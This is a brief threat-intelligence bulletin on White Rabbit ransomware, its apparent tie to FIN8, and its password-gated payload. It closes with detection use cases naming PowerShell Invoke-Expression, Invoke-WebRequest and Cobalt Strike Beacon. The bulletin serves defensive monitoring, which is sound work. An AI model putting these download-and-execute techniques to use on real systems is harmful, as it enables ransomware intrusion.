January 25, 2022

FIN8 Connection to White Rabbit Ransomware

Industry: N/A | Level: Tactical | Source: TrendMicro

New ransomware White Rabbit, has been identified from an attack against a US bank in December 2021. Given the infrastructure and tool usage it is potentially associated with the FIN8 threat group. There are currently limited details for the attack chain with only the identification of a PowerShell download through Cobalt Strike shared from TrendMicro’s observed telemetry. A distinction was also found in the White Rabbit’s payload having similarities with Egregor ransomware, described by TrendMicro, “One of the most notable aspects of White Rabbit’s attack is how its payload binary requires a specific command-line password to decrypt its internal configuration and proceed with its ransomware routine. This method of hiding malicious activity is a trick that the ransomware family Egregor uses to hide malware techniques from analysis.” Current observations find White Rabbit’s targets to be few and likely the malware is still being tested by threat actors.

  • Anvilogic Use Cases:
    • Invoke-Expression Command
    • Invoke-WebRequest Command
    • Cobalt Strike Beacon